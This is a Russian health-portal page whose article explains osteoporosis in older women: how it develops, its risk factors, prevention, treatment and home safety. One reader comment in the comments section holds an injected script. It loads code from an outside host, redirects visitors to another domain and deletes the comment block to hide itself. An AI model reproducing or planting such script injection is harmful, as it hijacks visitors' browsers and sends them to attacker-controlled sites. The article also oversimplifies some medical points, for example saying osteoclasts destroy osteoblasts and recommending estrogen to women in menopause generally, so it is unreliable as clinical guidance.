Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хрупкая болезнь  >>  Хрупкая болезнь
 
Обратная связь
 

Хрупкая болезнь

Размер шрифта
20 октября 2011 00:02
  • google_analytics: false
  • Нравится

Остеопороз – истончение костной ткани – верный спутник старости. Начинается он с приходом менопаузы, когда в организме происходят гормональные сдвиги.

Как развивается остеопороз?

Остеопороз – болезнь женщин в возрасте. С годами кальций из костей вымывается, за дело берутся остеокласты (клетки, разрушающие остеобласты, которые отвечают за крепкие кости). Кости становятся менее прочными, они легче ломаются.

Прочность костей поддерживается еще и женскими половыми гормонами – эстрогенами. С приходом менопаузы в организме снижается уровень эстрогенов, и кости остаются без гормональной поддержки.

Каковы последствия остеопороза?

Сильнее всего страдают от остеопороза кости бедер, запястий и позвонки. Остеопороз позвонков вызывает характерные изменения в осанке. Типичные признаки болезни – это покатые плечи и сгорбленная спина. А самые распространенные переломы при остеопорозе – это перелом шейки бедра и перелом лучевой кости.

Каковы факторы риска и можно ли их контролировать?

Конечно, такие факторы риска, как пол и возраст контролировать нельзя. Зато можно сделать следующее:


  1. Бросайте курить: курение снижает уровень эстрогенов.

  2. Ешьте больше продуктов с кальцием и витамином D, например, обезжиренное молоко, которое является одновременно и источником кальция, и источником витамина D.

  3. Ведите активный образ жизни. Увеличение мышечной массы снижает потерю костной ткани.

Еще одна группа риска – беременные женщины. Ребенку требуется много кальция, и женщина в период беременности активно его теряет. Поэтому во время беременности важно следить за своим уровнем кальция и витамина D, регулярно консультироваться с врачом по этому поводу.

Чем лечить остеопороз?

Специальные препараты – бисфосфонаты – препятствуют истончению костной ткани. Их прием способствует профилактике остеопороза. Кроме того, и для костей, и для нормального состояния организма женщинам в период менопаузы полезно принимать эстрогены в виде таблеток или инъекций.

Как защититься, если уже поставлен диагноз?

Если у вас обнаружили остеопороз, сделайте обстановку более безопасной.


  1. Закройте все острые углы.

  2. Постелите резиновые коврики в туалете и ванной.

  3. Обязательно установите в душе поручни.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.